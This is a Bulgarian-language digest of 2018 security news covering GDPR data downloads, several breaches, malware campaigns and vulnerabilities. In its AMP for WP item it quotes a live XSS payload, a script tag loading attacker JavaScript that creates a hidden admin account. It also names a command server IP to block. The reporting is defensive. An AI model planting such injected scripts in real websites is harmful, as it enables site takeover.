Информационна сигурност

Последен ъпдейт на 12 декември 2018 в 16:56 ч.

Социалните мрежи събират огромно количество лични данни за потребителите си. Достатъчно е да дадем за пример Facebook, която знае почти всичко за вас: кои са приятелите ви, какви са вашите интереси, какви са религиозните и политическите ви възгледи, какви места сте посещавали, кои са най-важните събития в живота ви.

Съгласно GDPR всяка компания, която събира лични данни за европейски граждани, трябва да им даде възможност да поискат копие от тези данни (и да им го предостави, когато си го поискат). Компаниите, които управляват социални мрежи, не са изключение. В съответствие с GDPR те дават възможност на всеки потребител да изтегли копие от личните си данни, които социалната мрежа е събрала за него.

В тази статия ще разгледаме как потребителите могат да свалят копие на личните си данни от 4 от най-популярните социални мрежи в света.

Facebook

Хегемонът в социалните мрежи е вероятно най-голямата база данни за хора в света. Както показва скандалът с Cambridge Analytica, данните от Facebook могат да се използват дори за манипулиране на избори и вземане на важни за обществото решения като Brexit. Социалната мрежа има информация за събития, места, приятели, интереси на своите потребителите. А в някои случаи – дори с кого са си говорили по телефона.

Ето как да видите с какви данни за вас разполага Facebook.

От основното меню във вашия профил (триъгълната икона в горния десен ъгъл) изберете:

Settings > Your Facebook Information > Download Your Information > View

Тук можете да направите фини настройки на данните, които искате да свалите: например формат, качество на снимките, изобор на данни само за определен период. Потвърдете избора си с Create File.

Ще получите известие, когато файлът с вашите данни е готов за сваляне. За да го изтеглите, отидете в:

Settings > Your Facebook Information > Download Your Information > Available Files > Download

Ще трябва да въведете паролата си за Facebook, преди свалянето да започне.

Instagram

Instagram държи архив с вашите снимки, видеа, истории, харесвания, съобщения. В събраните за вас данни има също информация за нещата, които сте търсили в социалната мрежа, вашите коментари и контакти.

Влезте в настройките на вашия Instagram профил (зъбчатото колело) и изберете:

Privacy & Security > Data Download > Request Download

На този етап Instagram ще поиска да въведете имейл адрес, на който да изпрати линк към вашите данни, както и да напишете паролата си за достъп до вашия Instagram профил.

Ще получите имейл, от който можете да свалите копие на данните си.

LinkedIn

LinkedIn събира на едно място голяма част от професионалния ви живот. Данните включват вашите професионални умения, телефонни номера, заемани длъжности, интереси, говорими езици, проекти, в които сте участвали, и много друга информация (пълен списък на данните има тук).

Влезте в профила си в LinkedIn и изберете иконката Me (в горния десен ъгъл, с вашата профилна снимка). От там изберете:

Settings & Privacy > Privacy > How LinkedIn uses your data > Change

Можете да избирате какви категории данни искате да получите: например контакти и връзки с други потребители, съобщения, препоръки, покани, информация от профила и т.н. Потвърдете избора си с Request Data. Ще трябва да въведете паролата си за достъп до LinkedIn. данните се изпращат с два имейла – първият съдържа основната информация в профила, а вторият – други данни като например коментари в групи или мобилни устройства, на които е активирано LinkedIn приложение с вашия профил.

Twitter

Twitter дава възможност да изтеглите копие на данните от вашия профил; съобщенията, които си обменяте с други потребители, медийни файлове, които сте качили, списък на последователите ви. Информацията включва и списъци, които сте създали или в които участвате, информацията за интересите ви; също и рекламите, които сте видели или кликнали.

За да свалите данните, натиснете иконата на профила си и изберете:

Settings and privacy > Your Twitter archive > Request your archive

Google

Търсачката Google и множеството продукти, които притежава – сред които са сайтът за видеосподеляне Youtube и браузърът Chrome – също пази огромен архив от данни за потребителите си. Можете да свалите копие от данните, които Google притежава за вас.

Личните данни на около 100 млн. потребители на сайта за въпроси и отговори Quora са били компрометирани. Една от информационните системи на компанията, която поддържа сайта, е била пробита от неизвестна засега трета страна, съобщи Quora в блога си.

„Голяма част от съдържанието, което е достъпено, така или иначе е публично, но компрометирането на акаунти и лични данни е сериозно“, коментират от Quora. сайтът се посещава от около 300 млн. уникални потребители месечно. Няма официална статистика каква част от тях са българи.

Всички засегнати потребители ще трябва отново да влязат в профилите си в Quora. Ако удостоверяват самоличнотта си с парола (Quora позволява да се впишат в платформата и с профила си във Facebook или Google), те ще трябва да сменят паролата си, тъй като старата ще бъде невалидна.

Какви данни са откраднати

От компанията посочват, че следните потребителски данни може да са компрометирани:

• Данни за профила – име, имейл адрес, парола в хеширан вид, данни от свързани социални мрежи;
• Публично достъпна информация – зададени въпроси, написани отговори и коментари, положителни гласувания;
• Непублична информация – отрицателни гласувания и директни съобщения между потребители;

„Анонимни въпроси и отговори не са засегнати, тъй като не пазим данни за хора, които публикуват анонимно“, посочват от Quora.

Каква е причината

Засега няма информация как точно са достъпени данните на потребителите на Quora. Пробивът е открит в петък и от тогава компанията се опитва да установи точните причини за него. „Разследването ни продължава, но сме взели мерки, за да ограничим последствията от пробива. Основен приоритет за нас като компания е да предотвратим подобни инциденти в бъдеще“, казват от Quora.

Какво да направите, ако използвате Quora

Ако профилът ви е засегнат по някакъв начин, ще получите имейл, който ви известява за това.

Възможно е паролата ви административно да е направена невалидна. В такъв случай ще трябва да я смените следващия път, когато се опитате да влезете в Quora. Дори и паролата ви да не е невалидна, можете да я смените като превантивна мярка от настройките на профила.

Ако профилът ви е засегнат и използвате същата парола и за други профили, добрата практика изисква да промените паролата си и за тях.

Последен ъпдейт на 4 декември 2018 в 11:14 ч.

Oператорът на хотели Starwood е претърпял пробив на базата данни с резервации, съобщи собственикът Marriott International. Откраднати са лични данни на около 500 млн. гости, въпреки че все още се проверява каква част от тях се дублират.

Неизвестният засега извършител е имал достъп до базата данни от 2014 г., твърди Marriott International. Компанията придоби Starwood през 2016 г. На 19 ноември 2018 г. мениджмънтът на Marriott е разбрал, че е разбита базата данни, съдържаща информация за гостите на тези хотели.

Индикации за пробив е имало и преди това, но не е било ясна коя база данни е пострадала. За проблема са информирани властите и съответните регулатори.

Имена, адреси, номера на банкови карти

За около 327 млн. гости откраднатите данни са различни комбинации от име, адрес за кореспонденция, телефонен номер, имейл, номер на паспорт, рожденна дата, пол, дата на пристигане и заминаване и други.

„За някои от гостите информацията включва и номера на карти за разплащания, но те са криптирани с AES-128. За декриптирането им са необходими два компонента. Към този момент не можем да изключим вероятността тези компоненти да са откраднати. За останалите гости откраднаните данни се ограничават до име, адрес за кореспонденция, имейл адрес, или друга информация“, съобщават от Marriott.

„Дълбоко съжаляваме за този инцидент“, заяви Арни Сорънсън, главен изпълнителен директор на компанията. Акциите на Marriott, които се търгуват на NASDAQ, поевтиняха с 5% още преди отварянето на борсовата сесия в САЩ.

От 30 ноември компанията е започнала да информира за пробива гостите, чиито имейли са били в базата данни на Starwood. Съзаден е и специален сайт, на който гостите могат да следят за информация и да задават въпроси.

Един от сериозните инциденти на 2018 г.

Инцидентът със Starwood със сигурност ще е един от най-големите пробиви на данни за 2018 г., ако се вземе предвид статистиката на Breach Level Index. През първото полугодие на годината има само два по-мащабни пробива.

Единият е свързан с Facebook и по-точно с функционалност в социалната мрежа, която позволяваше да се идентифицира собственикът на определен имейл или телефонен номер. Другият засяга индийската система за раздаване на идентификационни номера Aadhaar. Тя беше хакната, а данните на 1.2 млрд. граждани – откраднати.

Последен ъпдейт на 3 декември 2018 в 09:05 ч.

Хакерската група Sednit използва събитията около Brexit, за да разпространява малуер. Сред основните цели на групата са държавни институции в Централна Азия и Централна и Източна Европа.

В момента членовете на Sednit водят активна спам кампания, показва анализ на компанията за информационна сигурност Accenture Security. Имейлите съдържат зловреден документ Brexit 15.11.2018.docx, чието име заблуждава, че има връзка с преговорите между Великобритания и Европейския съюз. „Темата за Brexit подсказва кои са целите на групата, която се фокусира основно върху страни-членки на NATO, страни в Централна Азия и съседни на Русия страни“, коментират от Accenture Security.

В прикачения документ има макро скрипт, който сваля на компютъра истинския малуер – в случая Zekapab, известен още и като Zebrocy. Зловредният код събира информация от заразеното устройство като средство за шпионаж. Според компанията за киберсигурност ESET малуерът се използва активно поне от няколко години и постоянно еволюира.

За Sednit се предполага, че е свързана с руското разузнаване. Групата се счита за автор на някои значими атаки, включително и такива срещу държавни институции. Според ESET първата хакерска атака с UEFI руткит е дело именно на Sednit.

За атаката, станала известна като LoJax, беше съобщено в края на септември. Tя се отличава с това, че атакува UEFI на устройството и може да устои на смяна на операционната система и дори смяна на твърдия диск на заразения компютър. Според ESET основна цел на атаката с UEFI руткит са държавни институции от Централна и Източна Европа.

Актуалната спам кампания не се различава съществено от други подобни, извършвани от групата. Тя обаче показва, че членовете на Sednit продължават да са активни. „Предвид предполагаемата връзка с Русия, очевидно групата разполага с достатъчно ресурси, за да атакува организации. Ето защо са необходими инвестиции в защитни мерки“, коментират от Accenture Security.
[box type=“success“ align=“alignleft“ class=““ width=““]

Съвети за администратори

Блокирайте IP адреса на използвания за атаката команден сървър: 109.248.148.42;

Инструктирайте служителите във фирмата да не разрешават отварянето на скриптове от документи за Microsoft Office;
[/box]

Американското правосъдно министерство обвини двама ирански граждани за организиране на рансъмуер кампанията SamSam, Досега тя е ощетила частни и държавни институции по цял свят с поне 30 млн. долара, твърди обвинението.

Заподозрени за автори на SamSam са Фарамарз Шахи Саванди и Мохамед Мехди Шах Мансури. Според обвинението те са създали първата версия на SamSam в края на 2015 и са започнали да проучват организации, които да атакуват.

„Заподозрените са използвали малуер, за да нанаесат щети за над 30 млн. долара на над 200 институции. Според обвинението заподозрените са пробили компютърни системи в 10 американски щата, както и Канада, и са искали откуп. Криминалната им дейност е ощетила държавни агенции, общински власти, болници и безброй невинни жертви“, коментира зам.главният прокурор Род Розенстийн.

В търсене на слаби места

Голяма част от рансъмуер кампаниите таргетират безразборно десетки и дори стотици хиляди потребители. SamSam се отличава с това, че атакува конкретни организации. За да постигнат това, неговите автори първо намират организации със слабо място. В повечето случаи това е уязвим компютър, който използва RDP(Remote Desktop Protocol) за отдалечен достъп.

Уязвимият компютър се използва като входна точка, през която SamSam се вмъква в компютърната мрежа на организацията и криптира данните, намиращи се на свързаните устройства. За да бъдат декриптирани, жертвите трябва да платят откуп, чийто размер може да варира от няколко хиляди долара до 50 хил. долара.

Обвинението твърди, че следвайки този модел Шахи Саванди и Мехди Шах Мансури са спечелили над 6 млн. долара от събрани откупи.

Нов криминален бизнес модел

SamSam е в основата на нов бизнес модел в компютърната престъпност според едно от последните проучвания на компанията за киберсигурност Sophos. Именно SamSam е дал началото на таргетираните атаки срещу институции, при които размерът на исканите откупи може да стигне стотици хиляди долари и дори да надхвърли 1 млн. долара.

Според американското правосъдно министерство активност на SamSam за последно е засечена на 25 септември 2018 г. На тази дата с рансъмуер беше атакувано пристанището в Сан Диего.

Последен ъпдейт на 28 ноември 2018 в 10:54 ч.

Чат платформата Knuddels е първата компания в Германия, глобена за неспазване на изискванията на евродирективата GDPR. Глобата е в размер на 20 хил. евро. Наложена е, защото 1.8 млн. потребителски имена и пароли на нейни потребители бяха публикувани в интернет.

Кражбата на лични данни се е случила през юли 2018 г., твърди BleepingComputer. Knuddels не е криптирала по никакъв начин данните за достъп до потребителските профили. Tе са били откраднати  от сървърите й и качени в Pastebin, където традционно се публикуват крадени лични данни. Публикувани са и в облачната услуга Mega. Освен 1.8 млн. имена и пароли са изтекли и малко над 800 хил. имейл адреси.

Knuddels е информирала потребителите си и местните регулатори за пробива. „Данни за достъп на наши потребители бяха публикувани в интернет. Нямаме данни за злоупотреба. Въпреки това временно деактивирахме всички профили, чиито данни са изтекли“, съобщава компанията в публикация в своя форум от началото на септември.

GDPR влезе в сила в края на май 2018 г. и предвижда глоби до 20 млн. евро или 4% от годишния оборот на компанията (взима се по-голямото от двете) за неспазване на изискванията на директивата. При определяне размера на глобата се вземат различни фактори като брой на засегнатите потребители, превантивни мерки и взаимодействие с регулаторните органи.

Нови спам кампании заразяват компютрите с банковия малуер Emotet, показват данните на ESET и Forcepoint. Атаката се възползва от коледните празници, по време на които обикновено се отчита ръст в спам и фишинг кампниите.

Причината е, че хората очакват да получат имейли с промоционални оферти за покупки. Хакерите знаят това и изпращат зловредни имейли, маскирани като промоции.

Според Forcepoint в САЩ тече активна спам кампания с ваучери и поздравителни картички за Денят на благотворителността. Всъщност прикаченият в имейла файл съдържа скрипт, който сваля на компютъра малуер.

„В сравнение с предишни атаки, тази използва малко по-различен подход. В периода на Черния петък прикачените файлове са XML, въпреки че са направени да изглеждат като файлове с .doc разширение. Досега зловредните файлове бяха с разширение .doc или .pdf“, коментират от ESET. В началото на ноември компанията обяви рязко покачване на засечените зловредни имейли с Emotet.

Основните цели на настоящите кампании са Латинска Америка, САЩ, Германия, Великобритания и Южна Африка.

За съществуването на Emotet се знае поне от 2014 г. Една от основните му функции е да краде пароли за достъп до онлайн банкиране. Според американския център за борба с киберзаплахите US-CERT Emotet е „сред най-унищожителните и разходоемки заплахи, засягащи местните власти в САЩ“.

Независимо дали става дума за Emotet или друг зловреден код, коледните празници са време, в което трябва да отваряте имейли с повишено внимание. Прочетете нашия наръчник за разпознаване на фишинг атака.

Adobe съобщава за новооткрита критична уязвимост в популярния Flash Player. Тя е налична във всички версии на продукта до 31.0.0.148 и позволява отдалечено изпълнение на зловреден код на устройството на жертвата.

Уязвимостта е открита за пръв път на 13 ноември, но Adobe я обяви едва седмица по-късно. Това означава, че е възможно в този период уязвимостта да е била използвана, въпреки че от Adobe няма данни за злоупотреба. Теоретично уязвимостта може да бъде експлоатирана чрез зловреден Flash файл, намиращ се на създаден за целта сайт.

Flash Player е известен със своите уязвимости, затова повечето интернет браузъри изискват изрично съгласие на потребителя, преди да зареждат Flash файлове. Уязвимостта на плейъра е една от причините, поради които популярността му намаля значително през последните години. В същото време възходът на алтернативни технологии като HTML5 и WebGL доведе до това, че Adobe реши да прекрати поддръжката на Flash Player към края на 2020 г.

Според Джон Дън от Naked Security обаче дори и това няма да убие окончателно Flash Player: така, както Windows XP продължава да се използва 4 години, след като поддръжката на операционната система беше спряна. Това означава, че Flash Player ще продължи да е вектор на атака и потребителите ще трябва да внимават.

„Историята ни учи да сме реалисти. Flash най-вероятно ще продължи да съществува като зомби технология. И то дълги години, след като Adobe си измие ръцете и спре да я поддържа“, коментира Дън.

[box type=“success“ align=“alignleft“ class=““ width=““]

Съвети за потребители

Уязвимостта е отстранена във версия 31.0.0.153 на Flash Player. Можете да свалите най-новата версия от Flash Player Download Center;

Ако използвате Google Chrome или Microsoft Edge, обновете ги до най-новата версия;

[/box]

Уязвимост в популярния плъгин AMP For WP се експлоатира активно, съобщава Wordfence. Приставката, която се използва от поне 100 хил. уебмастъри, позволява създаване на администраторски акаунти и превземане на сайтове.

AMP For WP се използва от администраторите, за да оптимизират сайтовете си за мобилни устройства. На 17 ноември се появи предупреждение, че в плъгина има уязвимост. Тя позволява на регистриран в сайта потребител да създаде акаунт с администраторски права.

@TenableSecurity RE: https://t.co/4bOEVDebIr
Many exploits were discovered by me when I wanted to fix a bug, not @webarx_security. I just never released how to exploit it, because that’s in vain. See https://t.co/01pfQh6Sui for details, which I submitted after the fix went live.

— Sybre Waaijer (@SybreWaaijer) November 17, 2018

Според Wordfence тази уязвимост вече се експлоатира с XSS атака, при която авторът се опитва да инжектира зловреден код в набелязания сайт. При повечето засечени атаки инжектираният код изглежда така: <script src=https://sslapis[.]com/assets/si/stat.js></script>. 

Ако скриптът бъде зареден от браузъра на администратора, той създава нов потребител supportuuser с администраторски права, който е под контрола на авттора на скрипта.

„Тази малуер кампания показва, че статичните XSS уязвимости все още са заплаха. Ако хакерът може да подкара зловреден код в браузъра на администратора на сайта, той може да използва цял набор от техники, с които да поеме контрола над сайта“, коментират от Wordfence.

Преди по-малко от две седмици Wordfence съобщи за уязвимост в друг плъгин, която също позволява превземане на сайтове.
[box type=“success“ align=“alignleft“ class=““ width=““]

Как да се предпазите

Уязвимостта е отстранена във версия 0.9.97.20 на плъгина. Ако сайтът ви използва AMP For WP, обновете го до най-новата налична версия.
[/box]

Средният разход, който една компания плаща при пробив на своята информационна сигурност, се е повишил с 10% за последните 5 години. Стойността му вероятно ще продължи да расте заради влизането в сила на GDPR. Това са два от изводите в последното годишно проучване на Ponemon Institute.

Компаниите плащат средно по 3.86 млн. долара за пробив в информационната си сигурност. За последните 5 години този разход се е вдигнал с 10% или средно по 360 хил. долара на компания.

Къде е най-скъпо

Най-високите разходи са в САЩ. Там една компания плаща средно по 7.91 млн. долара, за да се справи с пробив в информаицонната си сигурност.

Това частично се дължи на факта, че американските компании плащат най-високите в света разходи за докладване на пробивите. Докато в страни като Индия средната сума е 20 хил. долара, в САЩ тя достига 740 хил. за компания. Причина за високите стойности в САЩ са регулаторните изисквания.

Според Ponemon Institute подобен ефект върху разходите ще има и евродирективата GDPR, която влезе в сила в края на май 2018 г. Тя засяга всички компании, които оперират на територията на Европейксия съюз. „Разходите за докладване в САЩ са високи заради американските регулации. Очакваме, че GDPR ще доведе до огромно увеличение за компаниите от цял свят в разходите за докладване при пробив“, коментират от Ponemon Institute.

Тенденция към покачване

Изследването е проведено сред 477 компании от 15 страни и региона на света. Всяка от тях е претърпяла пробив на данни през изминалите 12 месеца до юли. В анкетата влизат компании от сферата на здравеопазването, финансите, технологиите и комуникациите, търговията, фармацевтиката, енергетиката и др.

Средните разходи за 2018 г. дори не са най-високите за периода, откакто се води проучването. През 2016 г. например средният разход, причинен от пробив в информационната сигурност, е 4 млн. долара.

Като цяло обаче тенденцията е към трайно покачване. „Нашето проучване показва, че година след година информационните пробиви струват все по-скъпо на компаниите и все повече потребителски данни биват откраднати“, посочват от Ponemon Institute.

Защо разходите са все по-високи

Кои фактори оказват най-голямо влияние върху цената, която бизнесът плаща при пробив на данни? От Ponemon Institute посочват пет основни такива.

• Неочаквана загуба на клиенти след пробива – всеки пробив намалява доверието на клиентите в компанията, а с това намалява и тяхната лоялност. Ето защо компаниите, които имат назначен директор по сигурността на информацията, отчитат по-малки разходи при прибив на данни;
• Обем на откраднатите данни – колкото повече данни са откраднати, толкова по-скъпо излиза това на засегнатата компания;
• Време за откриване на пробива – колкото по-бързо една компания открие и се погрижи за пробива, толкова по-ниски ще са разходите й за покриването му;
• Ефективно управление на превантивните мерки – компаниите, които инвестират в превантивни мерки – дали ще са инструменти за засичане на пробиви или екипи, които се занимават със сигурността на данните – отчитат по- ниски разходи;
• Ефективно управление на разходите след пробива – такива са разходите за обслужване на клиентите, комуникация с клиенти и медиите, издаване на нови акаунти и т.н. Тези разходи се правят, след като е ясно какъв е мащабът на пробива и какви данни са пострадали. Ако компанията ги направи преди това, има опасност парите да са хвърлени напразно, което увеличава общата цена на пробива;